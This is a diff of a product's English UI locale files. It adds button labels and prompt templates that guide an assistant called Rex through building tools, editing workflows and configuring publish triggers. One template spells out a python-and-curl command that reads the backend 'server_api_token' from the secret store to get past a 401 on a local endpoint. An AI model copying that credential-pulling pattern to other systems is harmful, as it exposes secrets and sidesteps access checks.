+          "prompt": "I want to add an internal remote MCP service. Please guide me through URL, auth method, credential management, network reachability, tool-list inspection, and pre-production validation."
+        }
+      ]
+    },
+    "api": {
+      "emptyStateTitle": "No setup conversation yet",
+      "guidePanelTitle": "Rex Assisted Setup",
+      "guidePanelDesc": "Choose a guide or case. Rex will load the tool-builder skill, confirm API docs, auth, and output shape, then generate a YAML tool.",
+      "guideSectionTitle": "Setup Guides",
+      "caseSectionTitle": "Setup Cases",
+      "guideActions": [
+        {
+          "label": "How to Add API",
+          "description": "Start from Base URL, auth, endpoints, inputs, outputs, and test sample.",
+          "prompt": "Please follow the .flocks/plugins/skills/tool-builder skill to guide me through adding an external API as Flocks tools. Do not write files yet. Use the question tool to ask one most important question at a time and confirm API name, Base URL, auth method, core endpoints, input parameters, output fields, error handling, secret storage, and smoke test. After I confirm, generate YAML tools under ~/.flocks/plugins/tools/api/."
+        },
+        {
+          "label": "Parse API Docs",
+          "description": "Turn docs, sample requests, and responses into a tool definition draft.",
+          "prompt": "Please help me parse the API documentation into tool creation requirements. First ask for the docs URL or content, then extract endpoint paths, methods, auth, request parameters, response fields, pagination/rate limits, error codes, and test samples. Do not write files until I confirm."
+        },
+        {
+          "label": "Auth & Secrets",
+          "description": "Confirm API Key, Bearer, Header, Query, and credential storage.",
+          "prompt": "Please help me design auth and secret management for the API tool. First confirm auth type, secret name, whether {secret:...} is supported, whether default environment variables are needed, failure messages, and test method. Do not hardcode real credentials in code or config."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "Threat Intel API",
+          "description": "Add IOC lookup, reputation scoring, or intelligence summary endpoints.",
+          "prompt": "I want to add a threat intelligence API for IP, domain, URL, or hash reputation lookup. Please follow the tool-builder skill to guide me through API docs, auth method, input/output fields, error handling, and smoke test."
+        },
+        {
+          "label": "Alert Platform API",
+          "description": "Add alert query, detail lookup, or status update endpoints.",
+          "prompt": "I want to add an alert platform API for listing alerts, fetching details, or updating handling status. Please follow the tool-builder skill to guide me through endpoint scope, pagination, auth, output structure, and test data."
+        },
+        {
+          "label": "Asset Query API",
+          "description": "Add asset, host, vulnerability, or tag query endpoints.",
+          "prompt": "I want to add an asset query API for looking up assets by IP, hostname, or tags. Please follow the tool-builder skill to guide me through API docs, parameters, response fields, secret management, and validation."
+        }
+      ]
+    },
+    "local": {
+      "emptyStateTitle": "No creation conversation yet",
+      "guidePanelTitle": "Rex Assisted Creation",
+      "guidePanelDesc": "Choose a guide or case. Rex will load the tool-builder skill, confirm inputs, outputs, implementation, and smoke tests, then generate a local Python tool.",
+      "guideSectionTitle": "Creation Guides",
+      "caseSectionTitle": "Creation Cases",
+      "guideActions": [
+        {
+          "label": "How to Create Tool",
+          "description": "Start from tool name, parameter schema, return format, permissions, and test sample.",
+          "prompt": "Please follow the .flocks/plugins/skills/tool-builder skill to guide me through creating a Flocks local Python tool. Do not write files yet. Use the question tool to ask one most important question at a time and confirm tool name, function, input parameter schema, return format, whether it needs file/command/network access, error handling, and smoke test. After I confirm, generate the tool under ~/.flocks/plugins/tools/python/."
+        },
+        {
+          "label": "Design IO",
+          "description": "Turn a natural-language need into clear parameters, types, and return JSON.",
+          "prompt": "Please help me design the local tool input and output. First confirm user, input fields, field types, required fields, defaults, return JSON structure, error object, and one minimal test sample. Do not write files until I confirm."
+        },
+        {
+          "label": "Plan Tests",
+          "description": "Generate minimal, boundary, and failure samples.",
+          "prompt": "Please use the tool-builder skill to help me plan test samples for the local tool. First confirm normal input, boundary input, invalid input, expected output, and execution method. Show a test plan before writing files."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "Text Parser Tool",
+          "description": "Extract structured fields from logs, alerts, or reports.",
+          "prompt": "I want to create a local text parser tool that extracts structured fields from logs, alert text, or reports. Please follow the tool-builder skill to guide me through input format, field schema, parsing rules, and test samples."
+        },
+        {
+          "label": "JSON Transform Tool",
+          "description": "Clean, rename, or merge JSON fields.",
+          "prompt": "I want to create a local JSON transformation tool for cleaning, renaming, merging, or normalizing JSON fields. Please follow the tool-builder skill to guide me through input/output schema, transformation rules, and test samples."
+        },
+        {
+          "label": "Report Builder Tool",
+          "description": "Generate Markdown or summary reports from structured data.",
+          "prompt": "I want to create a local report builder tool that converts structured analysis results into a Markdown summary report. Please follow the tool-builder skill to guide me through input fields, report template, output format, and smoke test."
+        }
+      ]
+    }
+  },
+
   "addMCP": {
     "title": "Add MCP Service",
     "subtitle": "Configure and add an MCP service via form or chat",
@@ -494,9 +620,9 @@
     "toolCountLabel": "Tools",
     "resourceCountLabel": "Resources",
     "generateIntro": "Generate tools via AI conversation",
-    "generateDesc": "Switch to the \"AI Edit\" tab, describe the tool you need, Rex will auto-generate Python tool code and complete integration.",
+    "generateDesc": "Switch to the \"Workbench\" tab, describe the tool you need, Rex will auto-generate Python tool code and complete integration.",
     "doneLabel": "Done",
-    "mcpHintDesc": "Switch to the \"AI Edit\" tab, tell Rex what MCP service you want to connect, and it will automatically complete the configuration.",
+    "mcpHintDesc": "Switch to the \"Workbench\" tab, tell Rex what MCP service you want to connect, and it will automatically complete the configuration.",
     "connSuccess": "Connected",
     "connFailed": "Connection Failed",
     "addFailedTitle": "Add Failed"
diff --git a/webui/src/locales/en-US/update.json b/webui/src/locales/en-US/update.json
index b66de9504..a8f773023 100644
--- a/webui/src/locales/en-US/update.json
+++ b/webui/src/locales/en-US/update.json
@@ -21,7 +21,8 @@
   "waitingRestart": "Waiting for restart...",
   "checkFailed": "Failed to check version",
   "upgradeFailed": "Upgrade failed",
-  "restartTimeout": "Service restart timed out, please refresh manually",
+  "restartTimeout": "Service readiness check timed out: {{reason}}. Please refresh manually to confirm status.",
+  "restartUnknown": "No explicit health-check result was received",
   "dismissAction": "Don't remind me again",
   "dockerModeTitle": "Docker Deployment",
   "dockerModeDesc": "You are running Flocks via Docker. In-place upgrade is not available. Please pull the latest image and restart the container to upgrade.",
diff --git a/webui/src/locales/en-US/workflow.json b/webui/src/locales/en-US/workflow.json
index 6d71fe664..308320a1c 100644
--- a/webui/src/locales/en-US/workflow.json
+++ b/webui/src/locales/en-US/workflow.json
@@ -38,19 +38,69 @@
     "notFound": "Workflow not found",
     "backToList": "Back to List",
     "resetLayout": "Reset Layout",
-    "downloadMd": "Download MD",
-    "downloadMdTitle": "Download MD file",
-    "downloadJson": "Download JSON",
-    "downloadJsonTitle": "Download JSON file",
+    "flocksHelp": "Let Rex configure and edit workflows",
+    "flocksHelpTitle": "Let Rex configure and edit workflows",
+    "downloadMd": "Download Spec File",
+    "downloadMdTitle": "Download current workflow spec file",
+    "downloadJson": "Download Workflow File",
+    "downloadJsonTitle": "Download workflow file",
     "dragAdjust": "Drag to adjust panel width",
     "exportFailed": "Export failed",
-    "noMdDesc": "No MD description",
-    "noMdDescHint": "Describe your requirements in the right chat, AI will generate it automatically",
-    "mdUpdatedHint": "AI has updated the flow description, please check the MD document and provide feedback in the right chat.",
+    "noMdDesc": "No workflow.md",
+    "noMdDescHint": "Generate a workflow.md that is readable by both people and Flocks",
+    "mdUpdatedHint": "AI updated workflow.md. The diff is shown on the left; review it and continue in the right chat.",
+    "editDocTitle": "workflow.md",
+    "editDocUnsaved": "Unsaved",
+    "editDocModeEdit": "Edit",
+    "editDocModePreview": "Preview",
+    "editDocDiffTitle": "AI Change Diff",
+    "editDocDiffReviewDesc": "AI has already written these changes to workflow.md. Accept keeps the current content; reject restores the previous content.",
+    "editDocDiffHunkTitle": "Change {{index}}",
+    "editDocDiffAdded": "added",
+    "editDocDiffRemoved": "removed",
+    "editDocDiffAccept": "Accept",
+    "editDocDiffReject": "Reject",
+    "editDocDiffAcceptHunk": "Accept section",
+    "editDocDiffRejectHunk": "Reject section",
+    "editDocDiffRejecting": "Reverting",
+    "editDocDiffAcceptSuccess": "Accepted AI changes",
+    "editDocDiffAcceptHunkSuccess": "Accepted this section",
+    "editDocDiffRejectSuccess": "Rejected AI changes and restored workflow.md",
+    "editDocDiffRejectFailed": "Failed to reject AI changes",
+    "editDocDiffRejectHunkSuccess": "Rejected this section and updated workflow.md",
+    "editDocDiffRejectHunkFailed": "Failed to reject this section",
+    "editDocDiffEmpty": "No text differences detected",
+    "editDocSave": "Save",
+    "editDocSaving": "Saving",
+    "editDocSaveSuccess": "workflow.md saved",
+    "editDocSaveFailed": "Failed to save workflow.md",
+    "generateEditDoc": "Generate Spec",
+    "regenerateEditDoc": "Reset Document",
+    "generateEditDocTitle": "Ask Rex to generate workflow.md with the workflow-builder skill",
+    "regenerateEditDocTitle": "Reset the current workflow.md document",
+    "generateWorkflow": "Generate Workflow",
+    "generateWorkflowTitle": "Ask the workbench to generate or update workflow.json from the current workflow.md",
+    "regenerateWorkflowConfirmTitle": "Generate workflow?",
+    "regenerateWorkflowConfirmDesc": "workflow.md was saved. Generate or update workflow.json from the current content now?",
+    "regenerateWorkflowConfirmYes": "Generate",
+    "regenerateWorkflowConfirmNo": "Decline",
+    "editDocEmpty": "No workflow.md",
+    "editDocEmptyHint": "Generate a structured, editable workflow.md that can also guide workflow generation.",
+    "editDocPlaceholder": "Edit workflow.md here...",
+    "editDocTextareaLabel": "Edit workflow.md",
+    "generateEditDocPrompt": "This new task was triggered by the user clicking \"Generate Spec\". The button means: first use the workflow-builder skill to generate or complete the current workflow.md spec file. This task is not for generating workflow.json; unless I explicitly ask later, do not modify workflow.json.\n\nWorkflow name: {{name}}\nWorkflow directory: {{dir}}\nMD file: {{mdPath}}\nJSON definition file: {{jsonPath}}\n\nCurrent state: workflow.json exists, but workflow.md is missing or the left spec editor is empty. When entering the workbench, workflow.md must be generated first.\n\nPlease proceed as follows:\n1. Load and follow the workflow-builder skill first.\n2. You must use the question tool to ask whether I want a Chinese or English workflow spec; ask only one question at a time and allow custom input.\n3. Read the existing workflow.json and related workflow files, and use the workflow.json below to understand nodes, inputs, outputs, triggers, and execution logic.\n4. Use the workflow_zh.md / workflow_en.md template structure from the workflow-builder skill, but generate only one workflow.md file.\n5. Make workflow.md easy for humans to edit: explain purpose, scenarios, inputs, outputs, node flow, editable points, samples, and acceptance checks; do not make it read like machine JSON documentation.\n6. Before writing workflow.md, show a diff and wait for my confirmation; after confirmation, write {{mdPath}}.\n7. When finished, explain how workflow.md was generated and that the next step can be clicking \"Generate Workflow\" to update workflow.json from workflow.md.\n\nCurrent workflow.json:\n~~~json\n{{workflowJson}}\n~~~",
+    "generateWorkflowPrompt": "This new task was triggered by the user clicking the \"Generate Workflow\" button. The button means: generate or update the machine-executable workflow.json from the current workflow.md; unless I explicitly ask for it, do not regenerate or rewrite workflow.md.\n\nWorkflow name: {{name}}\nWorkflow directory: {{dir}}\nMD file: {{mdPath}}\nJSON definition file: {{jsonPath}}\n\nPlease proceed as follows:\n1. Load the workflow-builder skill first.\n2. Read the existing workflow.md and workflow.json, and use the current flow diagram structure to understand the existing implementation.\n3. Treat the current editor content of workflow.md as the main source of intent. If the file on disk differs from the content below, prefer the content below.\n4. Only generate/update workflow.json, preserving existing triggers, sample inputs, and metadata that are still reasonable.\n5. First provide a short generation plan. Before writing workflow.json, show a diff and wait for my confirmation.\n6. The generated workflow.json must be valid JSON, and nodes plus edges must form a complete flow diagram.\n7. When finished, explain what changed in workflow.json and how I should test it.\n\nCurrent editor content of workflow.md:\n~~~markdown\n{{editDocContent}}\n~~~",
     "canvasTabs": {
       "flow": "Flow Diagram",
-      "md": "MD Description",
-      "json": "JSON"
+      "md": "Flow Spec",
+      "json": "Workflow File"
+    },
+    "flowControls": {
+      "zoomIn": "Zoom in",
+      "zoomOut": "Zoom out",
+      "fitView": "Fit view",
+      "collapse": "Collapse canvas tools",
+      "expand": "Expand canvas tools"
     },
     "topBar": {
       "collapsePanel": "Collapse Panel",
@@ -68,9 +118,8 @@
     },
     "rightPanel": {
       "tabOverview": "Overview",
-      "tabChat": "AI Edit",
-      "tabRun": "Run",
-      "tabIntegration": "Integrations",
+      "tabChat": "Workbench",
+      "tabIntegration": "Publish",
       "renderError": "Component render error",
       "deleteWorkflow": "Delete Workflow",
       "deleteConfirmTitle": "Delete Workflow",
@@ -80,7 +129,8 @@
       "deleting": "Deleting..."
     },
     "overview": {
-      "configInfo": "Configuration",
+      "configInfo": "Info",
+      "workflowInfo": "Basics",
       "nodeCount": "Nodes",
       "nodesAndEdges": "{{nodes}} nodes / {{edges}} edges",
       "category": "Category",
@@ -88,6 +138,10 @@
       "createdBy": "Created By",
       "createdAt": "Created At",
       "updatedAt": "Updated At",
+      "workflowFiles": "Workflow Files",
+      "fileDir": "Directory",
+      "notGenerated": "(Not yet generated)",
+      "run": "Run",
       "runStats": "Run Statistics",
       "totalCalls": "Total Calls",
       "successRate": "Success Rate",
@@ -184,8 +238,10 @@
       "nodeLabel": "{{type}} Node"
     },
     "run": {
-      "testSection": "Test",
+      "testSection": "Test Run",
       "inputParams": "Input Parameters (JSON)",
+      "testSummaryIdle": "Inputs ready for a test run",
+      "triggerSection": "Trigger Capabilities",
       "rootObjectRequired": "Input parameters must be a JSON object",
       "running": "Running...",
       "testRun": "Test Run",
@@ -206,14 +262,46 @@
       "curlExample": "Call Example (curl)",
       "stopping": "Stopping...",
       "stopService": "Stop Service",
+      "deleteService": "Delete API publish config",
+      "deleteServiceShort": "Delete config",
+      "deletingService": "Deleting...",
+      "deleteServiceConfirm": "Delete this API publish config? If the service is still running, it will be stopped first.",
+      "deleteServiceFailed": "Failed to delete API publish config",
       "publishDesc": "Publish the workflow as a standalone API service with a dedicated invoke URL and API Key.",
       "publishing": "Publishing, please wait...",
       "publishAsApi": "Publish as API Service",
+      "guidePanelTitle": "Rex Assisted Publishing",
+      "guidePanelDesc": "Choose a publishing method. Rex will read guide.md and the config store first, then help you confirm, apply, or start it.",
+      "cardGuideTitle": "Flocks Assisted Config",
+      "cardGuideAction": "Assist config",
+      "cardGuideApiFocus": "API publish config",
+      "cardGuideApiDesc": "Use the current API service state, runtime driver, and workflow function to guide publishing, auth, sample calls, and whether to start it.",
+      "cardGuideTriggerDesc": "Use the current {{trigger}} card config and workflow function to guide input parameters, field mapping, samples, and apply/start behavior.",
+      "cardGuideDisplayLabel": "Flocks Assisted Config: {{focus}}",
+      "guideApiShort": "Publish API",
+      "guideApiDesc": "Ask Rex to confirm the API template, runtime driver, auth, invoke path, and whether to start the service.",
+      "guideApiInstruction": "The user clicked the API publish guide from the Publish page. Read guide.md around the \"Publish as API\" configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} so the backend can migrate the config.json fallback template. config.json and workflow.json publish/trigger entries are template sources only, not direct write targets and not proof of active state. When a template change is needed, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to actually start or stop the API service, use {{publishEndpoint}} / {{unpublishEndpoint}} after the template is confirmed. Do not pretend a service is published by editing template fields. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or published, and do not keep asking what to do with workflow.json templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideSyslogShort": "Syslog Input",
+      "guideSyslogDesc": "Ask Rex to confirm the Syslog trigger template, protocol, port, mapping, and listener start/stop behavior.",
+      "guideSyslogInstruction": "The user clicked the Syslog input guide from the Publish page. Read guide.md around Syslog trigger/listener configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Syslog trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop listening, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideKafkaShort": "Kafka Input",
+      "guideKafkaDesc": "Ask Rex to confirm the Kafka trigger template, broker, topic, group, input mapping, and start/stop behavior.",
+      "guideKafkaInstruction": "The user clicked the Kafka input guide from the Publish page. Read guide.md around Kafka trigger/consumer configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Kafka trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop consuming, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideScheduleShort": "Schedule",
+      "guideScheduleDesc": "Ask Rex to confirm the schedule trigger template, interval, inputs, timeout, and start/stop behavior.",
+      "guideScheduleInstruction": "The user clicked the Schedule guide from the Publish page. Read guide.md around Schedule/Workflow Poller configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a schedule trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop polling, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideWebhookShort": "Webhook Input",
+      "guideWebhookDesc": "Ask Rex to confirm the Webhook trigger template, path, method, auth, mapping, and sample.",
+      "guideWebhookInstruction": "The user clicked the Webhook input guide from the Publish page. Read guide.md around Webhook publish/input configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json Webhook triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Webhook trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not keep asking what to do with workflow.json Webhook trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideAdapterShort": "Custom Input",
+      "guideAdapterDesc": "Ask Rex to confirm the custom input template, adapter, IO contract, and validation method.",
+      "guideAdapterInstruction": "The user clicked the custom input guide from the Publish page. Read guide.md around custom Trigger/Adapter configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a custom input template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
       "dockerStarting": "Starting Docker container, may take 1-2 minutes...",
       "localStarting": "Starting local API service...",
       "serviceDriver": "Runtime",
       "driverLocal": "Local process",
       "driverDocker": "Docker container",
+      "applyDriver": "Apply runtime",
       "recommended": "Recommended",
       "driverLocalDesc": "Recommended first; starts faster for local development and debugging",
       "driverDockerDesc": "Runs isolated, best for validating container deployment",
@@ -270,6 +358,8 @@
       "syslogPortError": "Invalid port: must be an integer between 1 and 65535",
       "syslogActive": "Listening",
       "historySection": "Execution History",
+      "historySummary": "{{count}} records · Latest {{time}}",
+      "historySummaryLoading": "Loading execution history",
       "noHistory": "No execution records",
       "noOutput": "No output data",
       "stepsCompleted": "steps completed",
@@ -282,21 +372,74 @@
       "currentLabel": "Current",
       "inputPlaceholder": "Describe your workflow changes... (Enter to send)",
       "sessionTitle": "Edit Workflow \"{{name}}\"",
-      "contextMessage": "You are a workflow expert assistant helping users modify Flocks workflows. Please modify the workflow files based on the user's requirements.\n\nWorkflow Name: {{name}}\nCategory: {{category}}\nWorkflow Directory: {{dir}}\n\nFile Paths:\n- MD Description File: {{mdPath}}\n- JSON Definition File: {{jsonPath}}\n\nPlease load the workflow-builder skill first to complete the workflow modifications.",
+      "backendConfigAccessGuide": "Backend config-store authentication: directly curling GET {{configEndpoint}} returns 401 AuthError unless the request uses the Flocks backend API token `server_api_token`, stored in `flocks.security.get_secret_manager()`. This is not a browser cookie and not the `apiKey` under `api_services` in `flocks.json` (those are external-platform credentials). The backend service port is 8000; the WebUI on 5173 only forwards through the Vite proxy. Get the token with `python3 -c \"from flocks.security import get_secret_manager; print(get_secret_manager().get('server_api_token'))\"`. Read config with `curl -H \"Authorization: Bearer $(python3 -c 'from flocks.security import get_secret_manager; print(get_secret_manager().get(\"server_api_token\"))')\" \"http://127.0.0.1:8000{{configEndpoint}}\"`. Write config with `PUT {{configEndpoint}}`; migrate the fallback template with `POST {{configSyncEndpoint}}`. Related files: `flocks/security.py`, `flocks/server/auth.py`, `flocks/cli/main.py`, and `webui/src/config/apiProxy.ts`.",
+      "contextMessage": "You are a workflow expert assistant helping users modify or configure Flocks workflows. Choose the right skill and file operation based on the user's request.\n\nWorkflow ID: {{id}}\nWorkflow Name: {{name}}\nCategory: {{category}}\nWorkflow Directory: {{dir}}\n\nFile Paths:\n- Workflow document: {{mdPath}}\n- Workflow configuration guide: {{guidePath}}\n- JSON Definition File: {{jsonPath}}\n\nConfiguration endpoints:\n- Config template read/write: GET/PUT {{configEndpoint}}\n- Fallback template migration: POST {{configSyncEndpoint}}\n- API service start/stop: POST {{publishEndpoint}} / {{unpublishEndpoint}}\n- Trigger template management: {{triggersEndpoint}}\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nSkill selection rules:\n- When modifying, regenerating, or creating workflow files, load the workflow-builder skill first and use workflow.md as the primary source of intent.\n- When the user asks for Flocks Help, smart configuration, configuration review, publish/integration setup, or sample validation, you may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but you must first read and follow the workflow-local guide.md. Do not use the generic skill or skill references as a substitute for workflow-specific details in guide.md.\n\nSmart configuration guide rules:\n- Before configuration starts, you must read {{guidePath}}. If the file is missing or insufficient, explain the gap and use the question tool to ask whether to generate guide.md from workflow.md/config.json. Do not guess configuration details from a generic template.\n- Publish, input, and trigger templates must read the backend config store first: GET {{configEndpoint}}. If no stored template exists, use POST {{configSyncEndpoint}} to migrate the workflow-local config.json. config.json and workflow.json triggers are only import/fallback templates, not direct write targets, and cannot prove the configuration is active.\n- When changing a publish/input/trigger template, show a diff against the backend config first and confirm through the question tool; after confirmation, PUT the complete config object to {{configEndpoint}}. Do not directly modify workflow-local config.json or workflow.json to imply the configuration is active.\n- Publishing, starting, stopping, enabling, and disabling are runtime actions. Use the runtime endpoints in Current frontend API endpoints, such as {{publishEndpoint}}, {{unpublishEndpoint}}, {{triggersEndpoint}}, or the capability-specific endpoints. Do not pretend runtime state changed by editing template enabled fields.\n- If the backend config endpoint is unavailable, stop the configuration flow and clearly state that the backend config store cannot be read/written and nothing was applied, published, or started. Do not ask the user what to do with workflow.json trigger templates, and do not tell the user to use the WebUI later as a substitute for the result of this operation.\n- Keep the guide foolproof: when the user must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none.\n- Do not ask for or expose plaintext secrets in chat. Use the system secret management flow when secrets are required.\n- Prioritize helping the user understand the current configuration, fill key choices, prepare one sample, validate input/output, and produce a final summary.",
       "welcome": {
         "title": "Workflow \"{{name}}\"",
-        "descPart1": "Describe your changes, AI will first update the MD description file. Review the left ",
-        "mdTabLabel": "\"MD Description\"",
-        "descPart2": " view to confirm the flow is correct, then AI will sync the JSON definition file.",
-        "fileDir": "Workflow File Directory",
-        "notGenerated": "(Not yet generated)",
+        "descPart1": "Describe your changes directly, or start with Flocks Help to clarify the setup. When a change is needed, AI will use workflow.md first. Review the left ",
+        "mdTabLabel": "\"Flow Spec\"",
+        "descPart2": " view to confirm the flow is correct before syncing the JSON definition file.",
+        "editPanelTitle": "Rex Assisted Editing",
+        "editPanelDesc": "Choose an editing entry. Rex will read this workflow's workflow.md and workflow.json, then guide you through confirming and updating \"{{name}}\".",
+        "editSectionTitle": "Assisted Editing",
+        "configSectionTitle": "Assisted Config",
+        "publishSectionTitle": "Assisted Publishing",
+        "editRequirementShort": "Edit Requirement",
+        "editRequirementDesc": "Turn the requested functional change into a structured requirement that can update workflow.md.",
+        "editRequirementPrompt": "The user clicked \"Edit Requirement\". Follow the workflow-builder skill to modify the functional requirement of this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, summarize the current function, inputs, outputs, node flow, and known constraints; then use the question tool to ask one key question at a time to confirm the target, scope, input/output changes, acceptance criteria, and whether publish/trigger config is affected. Do not write files before showing a plan and diff and getting confirmation.",
+        "editNodeFunctionShort": "Change Node Function",
+        "editNodeFunctionDesc": "Adjust what a node is responsible for, its processing logic, inputs, outputs, and decision rules.",
+        "editNodeFunctionPrompt": "The user clicked \"Change Node Function\". Follow the workflow-builder skill to modify the business function of one node in this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json and list a brief summary of current node functions; then use the question tool to confirm which node to change, the current function, target function, input/output changes, acceptance criteria, and whether code implementation, upstream/downstream nodes, or publish config are affected. Do not write files before confirmation. When a change is needed, update the corresponding node function description in workflow.md first, show a diff, and only sync workflow.json after confirmation.",
+        "editNodeShort": "Edit Node Implementation",
+        "editNodeDesc": "Modify execution code, field mapping, tool arguments, or upstream/downstream connections.",
+        "editNodePrompt": "The user clicked \"Edit Node Implementation\". Follow the workflow-builder skill to edit implementation details of nodes in this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, list the current nodes and edges briefly; then use the question tool to confirm which node to change, execution logic, code or tool arguments, input/output changes, upstream/downstream edge impact, and sample-data impact. Show a plan and diff before modifying files.",
+        "editFlowShort": "Adjust Flow",
+        "editFlowDesc": "Add, remove, or move nodes, and adjust branches, loops, joins, and data flow.",
+        "editFlowPrompt": "The user clicked \"Adjust Flow\". Follow the workflow-builder skill to adjust this existing Flocks workflow structure. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json and output the current Mermaid flow diagram; then use the question tool to confirm which nodes to add/remove/move, branch conditions, loop or join logic, field flow, and sample impact. Do not write files before confirmation; when a change is needed, show the workflow.md/workflow.json plan and diff first.",
+        "editRegenerateShort": "Generate Workflow",
+        "editRegenerateDesc": "Generate workflow.json from the current workflow.md or fix mismatch between docs and JSON.",
+        "editRegeneratePrompt": "The user clicked \"Generate Workflow\". This button means: follow the workflow-builder skill to generate or repair workflow.json for this existing Flocks workflow from the current workflow.md. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, compare the human intent with the machine definition, then provide a short generation plan and use the question tool if the scope needs confirmation. The goal is to generate/update workflow.json, not to regenerate or rewrite workflow.md. Before writing workflow.json, show a diff and wait for confirmation.",
+        "guideTitle": "Flocks Help is ready",
+        "guideDesc": "Click once and I will read this workflow's guide.md, then lead you through the single most useful next step.",
+        "guidePrimary": "Start Smart Setup",
+        "guideAudit": "Review Config",
+        "guideSample": "Validate Sample",
+        "guidePrimaryShort": "Guide Smart Setup",
+        "guideAuditShort": "Review Current Config",
+        "guideSampleShort": "Validate Sample Data",
+        "guideInputModeShort": "Configure Inputs",
+        "guideSourceShapeShort": "Confirm Source Data",
+        "guideOutputShort": "Set Output Destination",
+        "guideFilterShort": "Adjust Filtering Rules",
+        "guideApplyShort": "Apply Config Plan",
+        "guidePrimaryDesc": "Let Flocks help configure this workflow",
+        "guideAuditDesc": "Check configured and missing items",
+        "guideSampleDesc": "Validate inputs and outputs with a sample",
+        "guideInputModeDesc": "Choose whether alerts enter through API, Syslog, Kafka, Webhook, Schedule, or files",
+        "guideSourceShapeDesc": "Confirm source product, payload format, and whether a sample exists",
+        "guideOutputDesc": "Choose local files, API response, Kafka/IM push, or downstream workflow output",
+        "guideFilterDesc": "Confirm filtering, denoise, deduplication, and business defaults",
+        "guideApplyDesc": "Choose whether to apply config, save a draft, or leave it unchanged",
+        "guideInputModeInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Input\" as an intent and extract entry modes, triggers, recommended defaults, constraints, and missing information to collect, then send one question card.",
+        "guideSourceShapeInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Source\" as an intent and extract source systems, payload shape, field mapping, sample status, and missing information to collect, then send one question card.",
+        "guideOutputInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Output\" as an intent and extract output contract, result storage, downstream destinations, external side effects, and missing information to collect, then send one question card.",
+        "guideFilterInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Rules\" as an intent and extract filtering, denoise, deduplication, thresholds, defaults, and missing information to collect, then send one question card.",
+        "guideSampleInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Sample\" as an intent and extract sample format, validation steps, prohibited side effects, and missing information to collect, then send one question card.",
